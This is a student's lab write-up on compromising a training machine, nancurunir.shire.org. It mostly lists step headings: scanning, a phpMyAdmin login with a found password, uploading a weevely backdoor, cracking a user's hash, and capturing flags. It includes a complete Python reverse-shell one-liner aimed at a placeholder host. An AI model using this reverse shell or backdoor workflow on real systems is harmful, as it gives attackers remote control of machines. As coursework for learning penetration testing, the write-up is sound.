Lab 10.2: Exploiting nancurunir

Target: nancurunir.shire.org

Target IP Address

nslookup result

Open Ports

nmap result

Discovered Vulnerabilities

dirb result

searchsploit for Apache

Php version 4.8.1

searchsploit for phpmyadmin

How you achieved a foothold

Phpmyadmin user password, password was shallnotpass

Root user password:

How to get the hash for gandalf

The Hash for the gandalf user

Password for gandalf User

Using 50457 to upload backdoor

Backdoor made

Back door uploaded

Connect to back door

Create a reverse shell in weevely:

export RHOST="HOST";export RPORT=PORT;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

How you achieved root/Administrative level compromise

Foot hold using the gandalf user:

User Flag

Root Flag

How might the vulnerabilities be mitigated by the system administrator?

Not using the same mysql root password as host root as well not having a gif on the homepage of the website that is the same as the phpmyadmin user password.

Reflection

I did have trouble after I got access to the machine using weevely I forgot how to make have reverse shell to be able to leverage the gandalf user.

Report

https://docs.google.com/document/d/1bGgOkBr3Hc3sTCex6RufGkkZMEZJ-MWAhUrAFgsWHhM/edit#